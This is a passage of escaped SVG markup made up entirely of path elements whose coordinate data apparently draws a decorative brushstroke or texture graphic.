d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path 